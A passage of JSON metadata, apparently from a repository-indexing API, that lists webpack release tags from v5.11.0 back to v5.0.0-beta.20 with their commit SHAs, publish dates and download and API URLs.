2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/